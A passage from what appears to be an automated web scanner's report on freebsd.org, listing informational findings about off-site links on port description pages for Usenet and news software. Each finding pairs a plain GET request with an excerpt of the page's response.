Date: Mon, 24 Jan 2011 16:37:15 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ther, it's a
toolkit for *building* robomoderators and gateways that attempts to
take care of all of the nitpicking details for you and drastically
decrease the amount of code you have to write.

WWW: <A HREF="http://search.cpan.org/dist/Gateway">http://search.cpan.org/dist/Gateway</A>
...[SNIP]...

20.609. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/rawdog/pkg-descr
The response contains the following links to other domains:
  • http://offog.org/code/rawdog.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/rawdog/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...

supports per-feed customizable update times, and uses ETags,
Last-Modified, and gzip compression to minimize network bandwidth
usage.

rawdog's output format is similar to that of PyDS and Hep.

WWW: <A HREF="http://offog.org/code/rawdog.html">http://offog.org/code/rawdog.html</A>
...[SNIP]...

20.610. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/brag/pkg-descr
The response contains the following links to other domains:
  • http://brag.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/brag/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Brag collects and assembles multipart binary attachements from newsgroups.
It is a robust command line tool, well suited to run as a cron job.

WWW: <A HREF="http://brag.sourceforge.net/">http://brag.sourceforge.net/</A>
...[SNIP]...

20.611. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/klibido/pkg-descr
The response contains the following links to other domains:
  • http://klibido.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/klibido/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:54 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
s. It has a nice, clean user interface, and supports using multiple
news servers with multiple connections per server. Articles may also be
viewed within the program, including graphic images.

WWW: <A HREF="http://klibido.sourceforge.net/">http://klibido.sourceforge.net/</A>
...[SNIP]...

20.612. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/xrn/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.mit.edu/people/jik/software/xrn.html

Request

GET /cgi/url.cgi?ports/news/xrn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
XRN is a program for reading News via NNTP on a UNIX machine which supports the
X Window System.

XRN is compliant with the Good Net-Keeping Seal of Approval (GNKSA).

WWW: <A HREF="http://www.mit.edu/people/jik/software/xrn.html">http://www.mit.edu/people/jik/software/xrn.html</A>
...[SNIP]...

20.613. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/fidogate/pkg-descr
The response contains the following links to other domains:
  • http://www.fidogate.org/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/fidogate/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
* Fido-Internet Gateway
* Fido FTN-FTN Gateway
* Fido Mail Processor
* Fido File Processor
* Fido Areafix/Filefix

WWW: <A HREF="http://www.fidogate.org/">http://www.fidogate.org/</A>
...[SNIP]...

20.614. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/net/pear-Net_NNTP/pkg-descr
The response contains the following links to other domains:
  • http://pear.php.net/package/Net_NNTP/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/net/pear-Net_NNTP/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Package for communicating with NNTP/Usenet servers.

WWW: <A HREF="http://pear.php.net/package/Net_NNTP/">http://pear.php.net/package/Net_NNTP/</A>
...[SNIP]...

20.615. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/tin/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.tin.org/

Request

GET /cgi/url.cgi?ports/news/tin/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:36 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
TIN is an easy to use threaded newsreader with NOV/NNTP support.

WWW: <A HREF="http://www.tin.org/">http://www.tin.org/</A>
...[SNIP]...

20.616. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/multisuck/pkg-descr
The response contains the following links to other domains:
  • http://multisuck.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/multisuck/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:00 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
A multi-server, multi-connections-per-server Usenet news sucking mechanism.
Feeds articles to a local news server. Powerful filtering capability. Runs
continuously as a quasi-daemon.

WWW: <A HREF="http://multisuck.sourceforge.net/">http://multisuck.sourceforge.net/</A>
...[SNIP]...

20.617. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-News-Newsrc/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/News-Newsrc
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-News-Newsrc/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
newsgroups
- testing whether groups exist and are subscribed
- marking and unmarking articles
- testing whether articles are marked
- returning lists of newsgroups
- returning lists of articles

WWW: <A HREF="http://search.cpan.org/dist/News-Newsrc">http://search.cpan.org/dist/News-Newsrc</A>
...[SNIP]...

20.618. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/suck/pkg-descr
The response contains the following links to other domains:
  • http://home.comcast.net/~bobyetman/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/suck/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
local machine, without the remote server doing
anything special. If you have read permission on the server, you can
use suck. Suck does NOT use the NEWNEWS command, hated by many
administrators.

WWW: <A HREF="http://home.comcast.net/~bobyetman/">http://home.comcast.net/~bobyetman/</A>
...[SNIP]...

20.619. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/chinese/pine4/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.washington.edu/pine/

Request

GET /cgi/url.cgi?ports/chinese/pine4/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:46 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
erc to activate the pgp add on scripts pgpdecode,
pgpencode, and pgpsign.

dot.pinerc.sample is an example configuration file(include PGP support) can be
put into your home directory as .pinerc.

WWW: <A HREF="http://www.washington.edu/pine/">http://www.washington.edu/pine/</A>
...[SNIP]...

20.620. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/mmail/pkg-descr
The response contains the following links to other domains:
  • http://multimail.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/mmail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:59 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ave whole area or one letter in a
text file, enter mail in any area (using an external editor), insert tagline
from a tagline file, reply mail with quote, write netmail, and netmail
addressbook.

WWW: <A HREF="http://multimail.sourceforge.net/">http://multimail.sourceforge.net/</A>
...[SNIP]...

20.621. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/newsstar/pkg-descr
The response contains the following links to other domains:
  • http://newsstar.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/newsstar/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
refore I wanted a program which could fetch
whatever articles my ISP has available, but use the foreign server to avoid
missing posts or getting them very late, and to do it as fast as possible.

WWW: <A HREF="http://newsstar.sourceforge.net/">http://newsstar.sourceforge.net/</A>
...[SNIP]...

20.622. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/xpn/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://xpn.altervista.org/

Request

GET /cgi/url.cgi?ports/news/xpn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
is always possible to override this choice.

There also other useful features like scoring, filtered views,
random tag-lines, external editor support, one-key navigation,
ROT13, spoiler char ...

WWW:    <A HREF="http://xpn.altervista.org/">http://xpn.altervista.org/</A>
...[SNIP]...

20.623. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/nget/pkg-descr
The response contains the following links to other domains:
  • http://nget.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/nget/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
sy retrieval,
even substituting parts from multiple servers. It handles disconnects
gracefully, resuming after the last part successfully downloaded,
and caching of header data for quick access.

WWW: <A HREF="http://nget.sourceforge.net/">http://nget.sourceforge.net/</A>
...[SNIP]...

20.624. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/lottanzb/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.lottanzb.org/

Request

GET /cgi/url.cgi?ports/news/lottanzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
LottaNZB is a graphical usenet frontend utilizing hellanzb
that simplifies the retrieval of binary news.

WWW: <A HREF="http://www.lottanzb.org">http://www.lottanzb.org</A>
...[SNIP]...

20.625. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/newsx/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.kvaleberg.com/newsx.html

Request

GET /cgi/url.cgi?ports/news/newsx/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
e not
distributed in the usual manner. Since newsx obeys the normal news spool
configuration file and requires little or no specific configuration, the
administrative burden should be minimized.

WWW: <A HREF="http://www.kvaleberg.com/newsx.html">http://www.kvaleberg.com/newsx.html</A>
...[SNIP]...

20.626. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/slrnconf/pkg-descr
The response contains the following links to other domains:
  • http://home.arcor.de/kaffeetisch/slrnconf.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/slrnconf/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:32 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
iry configuration of SLRN a
bit easier. Slrnconf will try to read your ~/.slrnrc at
startup. If you're using a different file, just open it via
File -> Open. There are no command line switches.

WWW: <A HREF="http://home.arcor.de/kaffeetisch/slrnconf.html">http://home.arcor.de/kaffeetisch/slrnconf.html</A>
...[SNIP]...

20.627. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/sn/pkg-descr
The response contains the following links to other domains:
  • http://infa.abo.fi/~patrik/sn/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/sn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
on to the internet. It is similar
to Leafnode. The target user is a home or SOHO with a single modem
connection to the Internet, maybe running IP masq or similar, and
serving a few workstations.

WWW:    <A HREF="http://infa.abo.fi/~patrik/sn/">http://infa.abo.fi/~patrik/sn/</A>
...[SNIP]...

20.628. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-News-Article/pkg-descr
The response contains the following links to other domains:
  • http://www.erlenstar.demon.co.uk/perl/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-News-Article/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
This module allows for creating articles from scratch, or reading them
from various data sources; various header manipulations, and posting
